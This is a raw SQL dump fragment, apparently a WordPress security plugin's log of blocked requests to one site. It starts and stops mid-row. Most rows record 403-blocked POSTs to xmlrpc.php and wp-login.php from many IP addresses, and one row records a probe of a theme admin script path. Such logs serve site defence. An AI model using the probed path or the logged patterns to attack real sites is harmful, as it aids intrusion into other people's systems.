Firefox\\/73.0\"}','ar9JoUkRHVue6myEv2CQZXWO',0,1664792659.3758,508,'','POST',403,0,515,0,1,'',0),('159.223.119.187',2682222523,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','QEAiUNK0jWGORq3TJxmtVoDS',0,1664792665.9111,578,'','POST',403,0,515,0,1,'',0),('72.29.76.78',1209879630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7iYB9TWfbcDQuXkpzOIEUsdn',0,1664792945.9141,12396,'','POST',403,0,515,0,1,'',0),('185.126.219.43',3112098603,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qZpF39EAg7MCOzGlQcJ6UDtL',0,1664792938.8776,19433,'','POST',403,0,515,0,1,'',0),('95.111.225.89',1601167705,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7B8vbME4WPahx16p5eZjX9YK',0,1664793362.0991,20185,'','POST',403,0,515,0,1,'',0),('150.95.112.79',2522837071,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sXZxQGjYeNFcI1J2A5H47mfT',0,1664793778.3841,8991,'','POST',403,0,515,0,1,'',0),('178.128.209.28',2994786588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2HytiXscJS5DVWERGlUwmpa6',0,1664793798.9905,622,'','POST',403,0,515,0,1,'',0),('212.38.40.215',3559270615,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BlA4odSJKPb9ZV5DLNnsGhaT',0,1664794653.8039,19192,'','POST',403,0,515,0,1,'',0),('72.9.145.140',1208586636,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1RzS3uVcsL9IX4eTD68B2qjJ',0,1664794678.2739,506,'','POST',403,0,515,0,1,'',0),('138.201.61.46',2328444206,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','7AfSVZhy6FIgDuRnQdB2WxJP',0,1664794781.2108,1827,'','POST',403,0,515,0,1,'',0),('84.54.23.178',1412831154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','TcX4ZUaqzY2InJ9b0HSyrB78',0,1664794782.4167,4365,'','POST',403,0,515,0,1,'',0),('162.213.249.210',2731932114,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','8e7wJnb5NV2udSvXgKrUWMAl',0,1664794783.2169,3663,'','POST',403,0,515,0,1,'',0),('15.161.131.84',262243156,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','4wxtCbqgzDj1s7JL3d2fKTuU',0,1664794796.8256,544,'','POST',403,0,515,0,1,'',0),('143.198.161.92',2412159324,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','MmhpO5X1aNuZjBPivdVsDUQW',0,1664794805.7463,2038,'','POST',403,0,515,0,1,'',0),('81.88.52.166',1364735142,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','9vPeoaYQ2JFIswrOklZ0U4mq',0,1664794806.7894,2197,'','POST',403,0,515,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BnL8dTuJy9KC3QspI6jYgPmG',0,1664795140.5252,8912,'','POST',403,0,515,0,1,'',0),('195.93.152.83',3277690963,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','REheJNLTFQs8amKyIoA1Yxzg',0,1664795139.3553,10127,'','POST',403,0,515,0,1,'',0),('162.219.250.15',2732325391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HGkF2L9pyinox8MT5WUYR7O3',0,1664795563.5862,14673,'','POST',403,0,515,0,1,'',0),('159.65.149.229',2671875557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lb2EVYy0hjSZ5i6OAGgcFDfp',0,1664795559.7182,18540,'','POST',403,0,515,0,1,'',0),('147.139.178.177',2475406001,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5g9zUaI3YXf0EuBH4rxPAyvi',0,1664796005.2966,18708,'','POST',403,0,515,0,1,'',0),('205.185.121.252',3451484668,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','pRKYvAd8jWTxBN0rbEMi2e3C',0,1664796439.9060,14300,'','POST',403,0,600,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aMDQdWs1PpvTGVolmRJquhKO',0,1664796451.5201,3294,'','POST',403,0,515,0,1,'',0),('125.227.29.249',2112036345,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uhzMLnJkebEq7ty36PFY5iUx',0,1664796455.1071,897,'','POST',403,0,515,0,1,'',0),('103.74.120.192',1732933824,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZYt7rMa2gq5O8zx6ov9CclGL',0,1664796913.9245,18712,'','POST',403,0,515,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Y1IamWlQKbEzN8BCfktFR7rj',0,1664797336.1434,17447,'','POST',403,0,515,0,1,'',0),('120.76.135.15',2018281231,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JTmRBfK5Q2kNtwvjhrub4A07',0,1664797343.9472,9646,'','POST',403,0,515,0,1,'',0),('97.79.239.127',1632628607,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','T1aoWFc4R96NpnsOZwkPtV0Y',0,1664797780.1202,19933,'','POST',403,0,515,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rapzP2SqDTKg8567Mkf3EG4N',0,1664797801.8555,658,'','POST',403,0,515,0,1,'',0),('208.109.79.3',3496824579,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','Ng49uz2BkhqWbQpOsGCTnfPK',0,1664798126.7597,1953,'','POST',403,0,515,0,1,'',0),('178.62.213.234',2990462442,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','gqw9b7X1BKWlfVI0x4zu3ipk',0,1664798130.7738,534,'','POST',403,0,515,0,1,'',0),('15.161.131.84',262243156,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','RP8mpijb1QuFXy7GDrgqoVcx',0,1664798138.4547,569,'','POST',403,0,515,0,1,'',0),('142.93.168.95',2388502623,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','wgGImVPnzi20Uqd6DsCLrcJ8',0,1664798140.9665,510,'','POST',403,0,515,0,1,'',0),('185.210.145.8',3117584648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','HoCzgFle7cw4fTZnPkItAp8m',0,1664798147.0437,1851,'','POST',403,0,515,0,1,'',0),('104.251.216.88',1761335384,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','fNzQAbp5wOGcWhI2nE3rd1eV',0,1664798148.2826,1633,'','POST',403,0,515,0,1,'',0),('217.69.15.37',3645181733,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','WQM1gfvIJUPFaorN8RzK23d5',0,1664798148.6015,1613,'','POST',403,0,515,0,1,'',0),('157.245.71.145',2650097553,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','Dg0aNZ5mfVW6Is3b7xltKBrU',0,1664798154.3723,7964,'','POST',403,0,515,0,1,'',0),('139.180.135.86',2343864150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','UwjGMzXolt7OTIsCfaiyZrn6',0,1664798156.1624,6176,'','POST',403,0,515,0,1,'',0),('153.92.0.19',2572943379,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','KXeqZiLw4Ax3JpMbzNI0Tvt6',0,1664798171.8210,563,'','POST',403,0,515,0,1,'',0),('162.219.250.15',2732325391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sKLgjuorODHR78NGXwmqxVMf',0,1664798209.5926,2140,'','POST',403,0,515,0,1,'',0),('173.212.197.26',2916402458,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RTK1MY2AxjBOygW6EP0U8h9b',0,1664798254.0887,535,'','POST',403,0,515,0,1,'',0),('123.31.21.26',2065634586,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','z1xSyDE23XGsZVwvimOKpkTM',0,1664799137.0653,516,'','POST',403,0,515,0,1,'',0),('178.128.104.173',2994759853,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OUn2L6zwQ1DVyKqR7W8mT05g',0,1664799569.5550,10399,'','POST',403,0,515,0,1,'',0),('107.189.6.184',1807550136,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','5VJx2SdNWbIjzRCOLT6gFu0w',0,1664799809.8298,1374,'','POST',403,0,600,0,1,'',0),('194.233.89.214',3270072790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kCdiqm6evO3TNhM70uHRaEx9',0,1664800067.5877,8809,'','POST',403,0,515,0,1,'',0),('162.214.123.41',2731965225,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','nfw1J2jsdWxVl9gOYSI47Mrm',0,1664800108.5547,1205,'','POST',403,0,515,0,1,'',0),('35.193.197.89',599901529,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bdaoghYmWMkUi5lfF0vrRuxP',0,1664800530.9946,1543,'','POST',403,0,515,0,1,'',0),('207.244.239.41',3488935721,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bHlBPyNiLXpf0tmkTFSI5s78',0,1664800552.3681,1289,'','POST',403,0,515,0,1,'',0),('15.161.131.84',262243156,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','sBj10OTYyc54hAVXnizSodMH',0,1664801532.7793,18021,'','POST',403,0,515,0,1,'',0),('115.165.166.192',1940235968,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','CsUR1lMbXdS9IhaipGw0Kyfq',0,1664801534.7712,16127,'','POST',403,0,515,0,1,'',0),('138.201.61.46',2328444206,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','HUPEkjdYzrcXKARtTeixqL4M',0,1664801570.0485,1185,'','POST',403,0,515,0,1,'',0),('153.92.0.19',2572943379,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','NyaKdOp1XkrUHQ8uW6gVSMeJ',0,1664801578.7066,1597,'','POST',403,0,515,0,1,'',0),('148.153.64.181',2493071541,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','3sw6Lj7gmDAVuz98anr21KqX',0,1664801579.6029,1251,'','POST',403,0,515,0,1,'',0),('162.55.131.89',2721547097,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','7TYWimvS8rad3FcQg0zMJebR',0,1664801587.5618,603,'','POST',403,0,515,0,1,'',0),('217.21.74.40',3642051112,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','4nK86pNX70WcAzswRB3TPYqU',0,1664801594.3125,505,'','POST',403,0,515,0,1,'',0),('153.92.0.19',2572943379,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','EeRl06FW7dTGC4yjYz8xHApP',0,1664801601.0045,565,'','POST',403,0,515,0,1,'',0),('173.212.201.41',2916403497,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','H3SFGwrmsIYb2Zn7yQRAJg1C',0,1664801664.9498,484,'','POST',403,0,600,0,1,'',0),('103.90.235.91',1734011739,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dIU4efH9PvzRwa8G6mVQrNup',0,1664801671.8703,465,'','POST',403,0,600,0,1,'',0),('107.180.103.185',1806985145,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lcN2IdFoUMmnR5SYbkPhE8Lz',0,1664803935.4909,19244,'','POST',403,0,515,0,1,'',0),('173.212.201.41',2916403497,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kf6307bUxmzuoLG4QZJO2iyp',0,1664803971.0411,1281,'','POST',403,0,515,0,1,'',0),('103.92.27.198',1734089670,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','K3xnXwBLlrV91yPJpugRCdAS',0,1664804426.2703,18599,'','POST',403,0,515,0,1,'',0),('209.141.46.253',3515690749,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','0FPYZaqMErwcICmvVixh7D91',0,1664804612.8411,3319,'','POST',403,0,600,0,1,'',0),('103.27.238.234',1729883882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','w2vXyzSULqKBRk8l31NPgfQW',0,1664804950.3049,18390,'','POST',403,0,515,0,1,'',0),('81.68.87.46',1363433262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','azgmcUybOvSud2oVh58e4QJR',0,1664804965.6951,3001,'','POST',403,0,515,0,1,'',0),('139.196.152.3',2344916995,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OSoFzLBpGTRvcj70CQEYwX4i',0,1664805479.6632,5361,'','POST',403,0,515,0,1,'',0),('80.77.135.125',1347258237,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dciDFQfGRIgoxAzNnrwLkmeu',0,1664805466.6817,18348,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','u9YPoIEyVO64T7CsMpRFjJlz',0,1664805957.7443,11452,'','POST',403,0,515,0,1,'',0),('89.233.5.168',1508443560,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2VNkO5vDph63aeBtqfYmoKCj',0,1664805951.2488,18041,'','POST',403,0,515,0,1,'',0),('193.136.232.254',3246975230,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','DpqgCfRtr1Kh6M49sen8iIuy',0,1664805968.8792,1636,'','POST',403,0,515,0,1,'',0),('42.200.109.156',717778332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HkdNfjyKwGqA0l8uLs5Qt7cb',0,1664805982.1817,2901,'','POST',403,0,515,0,1,'',0),('51.38.132.211',858162387,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','rGqchHJlRdu6wkOvyeTBiY9M',0,1664805993.0379,889,'','POST',403,0,515,0,1,'',0),('51.68.11.239',860097519,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','tCunMUWvNcodhV2DBg6slZjL',0,1664805993.7221,851,'','POST',403,0,515,0,1,'',0),('149.129.181.108',2508305772,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eK4Elg6Oa0bJqUwkhM1YB7Lm',0,1664806021.2426,1766,'','POST',403,0,515,0,1,'',0),('64.227.183.25',1088665369,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','Dz1kfUoWwV9FPlvGCq4AmRJu',0,1664806449.8333,17536,'','POST',403,0,600,0,1,'',0),('171.244.0.91',2884894811,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','gHlv35FSXwd7u4IDesGi20Yf',0,1664806485.2938,645,'','POST',403,0,600,0,1,'',0),('144.208.67.117',2429567861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZC56FNGUqSIbz2xVah0wfopW',0,1664806523.1250,3017,'','POST',403,0,515,0,1,'',0),('159.65.149.229',2671875557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eFW8OThl4dS9GI2Mu17Uxjb6',0,1664807057.0923,19075,'','POST',403,0,515,0,1,'',0),('196.44.176.39',3291263015,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','g2qHN8M6AO1BPUfoRblndvct',0,1664807077.3192,519,'','POST',403,0,515,0,1,'',0),('207.244.239.41',3488935721,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QPuLS2Vbn8pKT4t1U7rNHhYa',0,1664807568.0475,19254,'','POST',403,0,515,0,1,'',0),('208.113.180.18',3497112594,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','xr9KHpV4DiCFsmywzg2lO8ZS',0,1664807635.0199,1507,'','POST',403,0,600,0,1,'',0),('187.32.211.193',3139490753,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','aDH1GX5lKeZRP7mINwLxUvg2',0,1664807671.5511,1489,'','POST',403,0,600,0,1,'',0),('128.199.109.135',2160553351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','t6xDusEvPSVCncagoAU807rZ',0,1664808080.9022,18544,'','POST',403,0,515,0,1,'',0),('184.168.125.241',3098050033,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PanhUeYmTSlE17Wj0p2w9H43',0,1664808104.5433,1253,'','POST',403,0,515,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/photocrati-theme-v4.07/admin/scripts/scripts-update.php','','{\"1\":\"ALittle Client\"}','0RcQHmhI3lkq4teFvEdgMzUj',0,1664808238.2472,355,'','GET',403,0,700,0,1,'',0),('167.86.99.163',2807456675,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','9V5qLSofvEXiyNc7jzO4Bst8',0,1664808292.4260,9889,'','POST',403,0,515,0,1,'',0),('212.227.9.224',3571648992,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','4kQxpTS3PeF6GJraj0DVUlIs',0,1664808305.7596,643,'','POST',403,0,515,0,1,'',0),('142.93.168.95',2388502623,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','XrSvdUqD23PylN4fe6W1gjcF',0,1664808311.0300,574,'','POST',403,0,515,0,1,'',0),('123.25.21.16',2065241360,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','b4NjpfcUV0mAaxECIuwHT8zR',0,1664808842.5247,12852,'','POST',403,0,600,0,1,'',0),('198.98.60.32',3328326688,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','KIEVdP8yW56pHi2OwCczB4Ng',0,1664809717.6859,1337,'','POST',403,0,600,0,1,'',0),('209.141.55.206',3515693006,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','g6oGwYeChKAfHFdUtVJ8iQus',0,1664809901.7993,1875,'','POST',403,0,600,0,1,'',0),('72.167.34.14',1218912782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','7lZjq4TxU3BLmed1CAsoHFJW',0,1664809991.8623,1323,'','POST',403,0,600,0,1,'',0),('167.71.234.124',2806508156,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 